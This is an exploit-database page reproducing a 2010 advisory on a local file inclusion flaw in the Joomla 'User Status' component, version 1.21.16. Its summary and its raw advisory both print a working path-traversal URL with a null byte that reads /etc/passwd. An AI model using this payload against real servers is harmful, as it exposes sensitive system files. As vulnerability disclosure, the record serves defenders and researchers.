header-logo
Suggest Exploit
vendor:
User Status
by:
Chip D3 Bi0s
N/A
CVSS
N/A
Local File Inclusion
22
CWE
Product Name: User Status
Affected Version From: 1.21.16
Affected Version To: 1.21.16
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component User Status Local File Inclusion

The component back end allows the entry of locations. Also assigning users to a location is done in the back end. Users that are not assigned a location do not show up in the User Status Screen. After creating locations and assigning users, an attacker can exploit the vulnerability by sending a crafted URL to the vulnerable application, such as http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00, which will allow the attacker to view sensitive information from the server.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

---------------------------------------------------------------------------------
Joomla Component User Status Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: User Status
version		: 1.21.16 
Developer	: Mo Kelly
License		: GPL            type  : Commercial
Price		: 10.00 USD
Date Added	: 27 March 2010
Download	: http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html



Description     :

The component back end allows the entry of locations. Also assigning users to a location is done in the back end.
Users that are not assigned a location do not show up in the User Status Screen.

After creating locations and assigning users you may view their status from the front end.
Create a menu selection with user User Status component.

There is a separate module to allow users to update their status.

Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status.

A User's status must be updated to change, it will not expire with the user session.


--------------
file error	: components/com_userstatus/userstatus.php

how to exploit

http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Navigation

Suggest Exploit

Services By CQR